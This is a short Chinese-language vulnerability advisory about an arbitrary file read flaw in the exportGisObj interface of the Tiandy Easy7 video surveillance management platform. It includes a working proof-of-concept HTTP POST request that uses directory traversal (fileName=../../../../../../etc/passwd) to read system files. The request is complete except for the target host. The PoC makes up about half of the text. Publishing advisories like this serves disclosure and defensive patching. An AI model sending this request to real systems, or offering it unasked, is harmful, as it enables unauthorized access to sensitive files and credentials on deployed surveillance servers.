天地伟业Easy7 exportGisObj 存在任意文件读取漏洞

日期: 2025-10-15 | 影响软件: 天地伟业Easy7 | POC: 已公开

漏洞描述

天地伟业Easy7视频监控管理平台在实现exportGisObj接口时,未对用户提交的文件路径参数进行有效校验,导致攻击者可以通过构造特定的HTTP请求,读取服务器任意文件内容。例如,攻击者可通过目录遍历(如../../../../etc/passwd)方式,获取系统敏感文件,进而导致敏感信息泄露,严重时可为进一步攻击(如获取口令、配置文件等)提供条件。

PoC代码

POST /Easy7/rest/gis/exportGisObj HTTP/1.1
Host: 
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 37
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
X-Requested-With: XMLHttpRequest

fileName=../../../../../../etc/passwd

相关漏洞推荐